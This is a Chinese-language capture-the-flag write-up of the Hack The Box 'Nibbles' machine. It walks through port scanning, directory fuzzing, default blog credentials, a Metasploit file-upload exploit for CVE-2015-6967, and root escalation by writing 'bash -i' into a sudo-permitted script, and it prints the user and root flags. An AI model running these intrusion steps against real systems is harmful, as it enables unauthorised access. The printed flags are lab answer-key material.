HTB:Nibbles[WriteUP]
目录
连接至HTB服务器并启动靶机
1.How many open TCP ports are listening on Nibbles?
使用nmap对靶机TCP端口进行开放扫描
2.What is the relative path on the webserver to a blog?
使用ffuf对靶机80端口Web进行路径FUZZ
3.What content management system (CMS) is being used by the blog?
使用浏览器对/nibbleblog进行访问
4.What is the relative path to an XML file that contains the admin username?
使用feroxbuster对靶机/nibbleblog目录下整体进行路径递归扫描
5.What is the admin user's password to log into the blog?
6.What version of nibble blog is running on the target machine? Do not include the "v".
7.What is the 2015 CVE ID for an authenticated code execution by file upload vulnerability in this version of NibbleBlog.
使用searchsploit搜索该BibbleBlog版本相关漏洞
8.Which user the Nibbleblog instance is running on the target machine?
9.Submit the flag located in the nibbler user's home directory.
USER_FLAG:74926960e8914c5566003d8978b366d4
10.What is the name of the script that nibbler can run as root on Nibbles?
11.Enter the permission set on monitor.sh? Use the Linux file permissions format, like -rw-rw-r--.
靶机中新建两个文件夹
12.Submit the flag located in root's home directory.
ROOT_FLAG:273ce39224dcf6ea02f2bc507a3e7c20
连接至HTB服务器并启动靶机
靶机IP:10.10.10.75
分配IP:10.10.14.12
1.How many open TCP ports are listening on Nibbles?
使用nmap对靶机TCP端口进行开放扫描
nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.75┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.10.75
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-07 00:58 EST
Nmap scan report for 10.10.10.75 (10.10.10.75)
Host is up (0.065s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open httpNmap done: 1 IP address (1 host up) scanned in 44.96 seconds
由扫描结果可知,靶机开放TCP端口:22、80共2个端口
2.What is the relative path on the webserver to a blog?
使用ffuf对靶机80端口Web进行路径FUZZ
可见文件index.html,直接使用浏览器对其进行访问,Ctrl+U查看源码
找到blog路径:/nibbleblog
3.What content management system (CMS) is being used by the blog?
使用浏览器对/nibbleblog进行访问
由页面显示可知,当前CMS为:Nibbles
4.What is the relative path to an XML file that contains the admin username?
使用feroxbuster对靶机/nibbleblog目录下整体进行路径递归扫描
feroxbuster --url http://10.10.10.75/nibbleblog/ -s 200,301,302 -W 0 -w ../dictionary/common.txt -t 200在终端工具中,按住Ctrl+Shift+F对XML文件进行搜索
使用浏览器访问该文件(/nibbleblog/content/private/users.xml),可见用户名:admin
5.What is the admin user's password to log into the blog?
因为feroxbuster扫出来的东西太乱了,使用ffuf再次对/nibbleblog目录下简单扫描
使用浏览器访问admin.php
Google上可以直接找到默认凭证
账户:admin
密码:nibbles
6.What version of nibble blog is running on the target machine? Do not include the "v".
访问之前扫到的README文件
获取该Nibbles版本:4.0.3
7.What is the 2015 CVE ID for an authenticated code execution by file upload vulnerability in this version of NibbleBlog.
使用searchsploit搜索该BibbleBlog版本相关漏洞
searchsploit Nibbleblog
将该rb文件拷贝到当前目录下
searchsploit -m 38489.rb┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 38489.rb
Exploit: Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)
URL: https://www.exploit-db.com/exploits/38489
Path: /usr/share/exploitdb/exploits/php/remote/38489.rb
Codes: CVE-2015-6967, OSVDB-127059
Verified: True
File Type: Ruby script, ASCII text
Copied to: /home/kali/Desktop/temp/38489.rb
由描述可知,该EXP基于漏洞:CVE-2015-6967
8.Which user the Nibbleblog instance is running on the target machine?
该模块在MSF中,启动Metasploit
msfconsole搜索nibbleblog相关利用模块
search nibbleblog
其他参数选项按照平常配置,其中目标URI
set TARGETURI /nibbleblog
执行getuid命令,由回显可知当前用户为:nibbler
9.Submit the flag located in the nibbler user's home directory.
切换到终端
shell查找user_flag并查看其内容
find / -name 'user.txt' 2>/dev/null
/home/nibbler/user.txt
cat /home/nibbler/user.txt
74926960e8914c5566003d8978b366d4
USER_FLAG:74926960e8914c5566003d8978b366d4
10.What is the name of the script that nibbler can run as root on Nibbles?
查看当前用户可特权运行的命令
sudo -lsudo -l
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
由回显可知,当前用户可特权运行文件:monitor.sh
11.Enter the permission set on monitor.sh? Use the Linux file permissions format, like -rw-rw-r--.
直接cat该文件,居然提示文件不存在
由于这一题不存在该文件,更不用说查看它权限了,直接跳过不做此题
cat /home/nibbler/personal/stuff/monitor.sh
cat: /home/nibbler/personal/stuff/monitor.sh: No such file or directory
进入/home/nibbler目录下,发现连personal目录都没有
cd /home/nibbler
ls
personal.zip
user.txt
ls -a
.
..
.bash_history
.nano
personal.zip
user.txt
那就好办了,我们直接给它弄一个这文件出来直接getshell就行
靶机中新建两个文件夹
mkdir personal
cd personal
mkdir stuff
cd stuff
新建monitor.sh文件
nibbler@Nibbles:/home/nibbler/personal/stuff$ touch monitor.sh
touch monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls
ls
monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo 'bash -i' > monitor.sh
echo 'bash -i' > monitor.sh
直接运行该文件
sudo /home/nibbler/personal/stuff/monitor.shnibbler@Nibbles:/home/nibbler/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
<er/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
root@Nibbles:/home/nibbler/personal/stuff# whoami
whoami
root
12.Submit the flag located in root's home directory.
查找root_flag位置并查看其内容
root@Nibbles:/home/nibbler/personal/stuff# find / -name 'root.txt'
find / -name 'root.txt'
/root/root.txt
root@Nibbles:/home/nibbler/personal/stuff# cat /root/root.txt
cat /root/root.txt
273ce39224dcf6ea02f2bc507a3e7c20